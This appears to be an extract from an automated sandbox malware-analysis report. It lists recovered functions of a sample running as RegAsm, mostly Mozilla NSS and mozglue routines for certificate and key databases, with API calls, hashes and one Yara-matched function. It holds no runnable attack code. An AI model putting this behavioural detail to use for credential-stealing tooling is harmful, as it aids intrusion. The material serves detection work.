                                                                                    • Instruction Fuzzy Hash: FE51363E6002209FDB105BE9D8587AAB7B4EB47328F14052AF91583F41FB754804CBBA
                                                                                    Function 6CC6D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBE804), ref: 6CC6D047
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6CC6D093
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC6D0A6
                                                                                    • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6CCBE810,00000040), ref: 6CC6D0D0
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE7B8,00001388), ref: 6CC6D147
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE744,00001388), ref: 6CC6D162
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE784,00001388), ref: 6CC6D18D
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE7DC,00001388), ref: 6CC6D1B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                    • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                    • API String ID: 2957312145-326518326
                                                                                    • Opcode ID: 2e8aafadb6554c9b257a7ac61c0ee5870f99878bc684381d5172db8926274143
                                                                                    • Instruction ID: c50c1e093bbb7c57f3f528629ea322eb351c608e084e2fffade4dd2aab1bc9e8
                                                                                    • Opcode Fuzzy Hash: 2e8aafadb6554c9b257a7ac61c0ee5870f99878bc684381d5172db8926274143
                                                                                    • Instruction Fuzzy Hash: 4581D170B042109BEB009FEADA94B6937B4FB46B04F2405AEE901E7F80F7759805CBD9
                                                                                    Function 6CD96CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CD96943
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CD96957
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CD96972
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CD96983
                                                                                      • Part of subcall function 6CD96910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CD969AA
                                                                                      • Part of subcall function 6CD96910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CD969BE
                                                                                      • Part of subcall function 6CD96910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CD969D2
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CD969DF
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CD96A5B
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CD96D8C
                                                                                    • free.MOZGLUE(00000000), ref: 6CD96DC5
                                                                                    • free.MOZGLUE(?), ref: 6CD96DD6
                                                                                    • free.MOZGLUE(?), ref: 6CD96DE7
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CD96E1F
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD96E4B
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD96E72
                                                                                    • free.MOZGLUE(?), ref: 6CD96EA7
                                                                                    • free.MOZGLUE(?), ref: 6CD96EC4
                                                                                    • free.MOZGLUE(?), ref: 6CD96ED5
                                                                                    • free.MOZGLUE(00000000), ref: 6CD96EE3
                                                                                    • free.MOZGLUE(?), ref: 6CD96EF4
                                                                                    • free.MOZGLUE(?), ref: 6CD96F08
                                                                                    • free.MOZGLUE(00000000), ref: 6CD96F35
                                                                                    • free.MOZGLUE(?), ref: 6CD96F44
                                                                                    • free.MOZGLUE(?), ref: 6CD96F5B
                                                                                    • free.MOZGLUE(00000000), ref: 6CD96F65
                                                                                      • Part of subcall function 6CD96C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CD9781D,00000000,6CD8BE2C,?,6CD96B1D,?,?,?,?,00000000,00000000,6CD9781D), ref: 6CD96C40
                                                                                      • Part of subcall function 6CD96C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CD9781D,?,6CD8BE2C,?), ref: 6CD96C58
                                                                                      • Part of subcall function 6CD96C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CD9781D), ref: 6CD96C6F
                                                                                      • Part of subcall function 6CD96C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CD96C84
                                                                                      • Part of subcall function 6CD96C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CD96C96
                                                                                      • Part of subcall function 6CD96C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CD96CAA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD96F90
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD96FC5
                                                                                    • PK11_GetInternalKeySlot.NSS3 ref: 6CD96FF4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                    • String ID:
                                                                                    • API String ID: 1304971872-0
                                                                                    • Opcode ID: e8715828ab51029ac28d3315f3cd0de504133fb108073b1d4d351eb96dde8b96
                                                                                    • Instruction ID: ab18e695285700dcb73f8b49ff95f5895ccef0ebbfa3a097ca848a39334b3dde
                                                                                    • Opcode Fuzzy Hash: e8715828ab51029ac28d3315f3cd0de504133fb108073b1d4d351eb96dde8b96
                                                                                    • Instruction Fuzzy Hash: 20B171B8E01209DFDF40DFA5D844B9EBBB4AF05348F144125E815E7A60E731E916CBE1
                                                                                    Function 00411CD8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411CDD
                                                                                    • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                    • ExitProcess.KERNEL32 ref: 00411D0A
                                                                                    • strtok_s.MSVCRT ref: 00411D21
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitH_prologProcessstrtok_s
                                                                                    • String ID: block
                                                                                    • API String ID: 3745986650-2199623458
                                                                                    • Opcode ID: 1dbe8b763468693bcda6bb6f8d5edcca79240a92ff831681b66820cc3ba335ab
                                                                                    • Instruction ID: f4c5763e50a99cb5442b9313d279402bb2719ed402546ee48011a43b6642ca44
                                                                                    • Opcode Fuzzy Hash: 1dbe8b763468693bcda6bb6f8d5edcca79240a92ff831681b66820cc3ba335ab
                                                                                    • Instruction Fuzzy Hash: 4741E674A40352EADB109FF1AC45BEB77A8BB05B44B60443FFB03E2560E7789584CB18
                                                                                    Function 6CD84CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CD84CF3
                                                                                    • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD84D28
                                                                                    • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD84D37
                                                                                      • Part of subcall function 6CE6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE6D963
                                                                                    • PR_LogPrint.NSS3(?,00000000), ref: 6CD84D4D
                                                                                    • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CD84D7B
                                                                                    • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD84D8A
                                                                                    • PR_LogPrint.NSS3(?,00000000), ref: 6CD84DA0
                                                                                    • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CD84DBC
                                                                                    • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CD84E20
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Print$L_strncpyz$L_strcatn
                                                                                    • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nl
                                                                                    • API String ID: 1003633598-534071768
                                                                                    • Opcode ID: 724e899c682946466b73918cd662547a43c3b66dff309a995ea6b6269f887d74
                                                                                    • Instruction ID: 6c919d42e2104ac106fbf6839c50a48d806cfc074102ef1179c9ed7fba67bde3
                                                                                    • Opcode Fuzzy Hash: 724e899c682946466b73918cd662547a43c3b66dff309a995ea6b6269f887d74
                                                                                    • Instruction Fuzzy Hash: 60410871A02104EFD701DB54DE98F7A37B9EF5230DF148069F9096BA61DB309948CBA6
                                                                                    Function 6CC45E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45E9D
                                                                                      • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                                      • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                                      • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                                      • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC45EAB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC45EB8
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45ECF
                                                                                    • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CC46017
                                                                                      • Part of subcall function 6CC34310: moz_xmalloc.MOZGLUE(00000010,?,6CC342D2), ref: 6CC3436A
                                                                                      • Part of subcall function 6CC34310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC342D2), ref: 6CC34387
                                                                                    • moz_xmalloc.MOZGLUE(00000004), ref: 6CC45F47
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC45F53
                                                                                    • GetCurrentThread.KERNEL32 ref: 6CC45F5C
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC45F66
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC45F7E
                                                                                    • moz_xmalloc.MOZGLUE(00000024), ref: 6CC45F27
                                                                                      • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                                    • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC45E8C
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC4605D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC460CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                    • String ID: GeckoMain
                                                                                    • API String ID: 3711609982-966795396
                                                                                    • Opcode ID: 17fa1146c72fb257d794f7379d2c5853f9092ce3f40034b6055d3b60330c6798
                                                                                    • Instruction ID: 6814ab0d17035f7502bb5e2369cd3f8a2c49e669ea72b582e3892990ab10bded
                                                                                    • Opcode Fuzzy Hash: 17fa1146c72fb257d794f7379d2c5853f9092ce3f40034b6055d3b60330c6798
                                                                                    • Instruction Fuzzy Hash: C571E4B46057409FD700DF69C4C0A6ABBF0FF49304F54896DE48687B52EB31E849CB96
                                                                                    Function 6CC49590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC331C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC33217
                                                                                      • Part of subcall function 6CC331C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC33236
                                                                                      • Part of subcall function 6CC331C0: FreeLibrary.KERNEL32 ref: 6CC3324B
                                                                                      • Part of subcall function 6CC331C0: __Init_thread_footer.LIBCMT ref: 6CC33260
                                                                                      • Part of subcall function 6CC331C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC3327F
                                                                                      • Part of subcall function 6CC331C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3328E
                                                                                      • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332AB
                                                                                      • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332D1
                                                                                      • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC332E5
                                                                                      • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC332F7
                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC49675
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC49697
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC496E8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC49707
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4971F
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49773
                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC497B7
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC497D0
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC497EB
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49824
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                    • API String ID: 3361784254-3880535382
                                                                                    • Opcode ID: 601137733288f0fa58f6143d9ae7cfdac585fd86eaf83e346e16b5998d57d83c
                                                                                    • Instruction ID: 3f3e73885fe08f87aa6b912e3173862560fb48af3337b011478d0ee50b2c5c42
                                                                                    • Opcode Fuzzy Hash: 601137733288f0fa58f6143d9ae7cfdac585fd86eaf83e346e16b5998d57d83c
                                                                                    • Instruction Fuzzy Hash: D261F3796002119FDF00CFE9DA88B9A3BB8EB4A314F10C569F915A3B80E730E944CB95
                                                                                    Function 6CC47FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6CC48007
                                                                                    • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6CC4801D
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6CC4802B
                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6CC4803D
                                                                                    • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6CC4808D
                                                                                      • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6CC4809B
                                                                                    • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CC480B9
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC480DF
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC480ED
                                                                                    • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC480FB
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC4810D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC48133
                                                                                    • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6CC48149
                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6CC48167
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6CC4817C
                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC48199
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 2721933968-0
                                                                                    • Opcode ID: 8f415ae40f9ab42d0608a286f46ed1209a72dbb847ddffdd64661b2790504f05
                                                                                    • Instruction ID: 4cd7d63cff29f2e1093a616d45f45fd7a678a30df627b810b33d07ad6d71f922
                                                                                    • Opcode Fuzzy Hash: 8f415ae40f9ab42d0608a286f46ed1209a72dbb847ddffdd64661b2790504f05
                                                                                    • Instruction Fuzzy Hash: 895183B2E002149BDB00DBA9DC84AEFB7B9AF49364F148126E815E7741F735A905CBA1
                                                                                    Function 6CC96660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96694
                                                                                    • GetThreadId.KERNEL32(?), ref: 6CC966B1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC966B9
                                                                                    • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CC966E1
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96734
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC9673A
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF618), ref: 6CC9676C
                                                                                    • GetCurrentThread.KERNEL32 ref: 6CC967FC
                                                                                    • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CC96868
                                                                                    • RtlCaptureContext.NTDLL ref: 6CC9687F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                    • String ID: WalkStack64
                                                                                    • API String ID: 2357170935-3499369396
                                                                                    • Opcode ID: 05ce91893531c86a705ee82389ca70b4f55f63aa736e457722385bd767acdf9d
                                                                                    • Instruction ID: af78d29077be33a60a17b64599f805b13a55f32f750c1917ff7349afd26404fb
                                                                                    • Opcode Fuzzy Hash: 05ce91893531c86a705ee82389ca70b4f55f63aa736e457722385bd767acdf9d
                                                                                    • Instruction Fuzzy Hash: BC51DB71A09701AFDB51CFA4C884B5ABBF4BF89714F00492DF89887690E770E908CB96
                                                                                    Function 6CC7DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7DE73
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7DF7D
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7DF8A
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7DFC9
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7DFF7
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7E000
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC44A68), ref: 6CC7DE7B
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
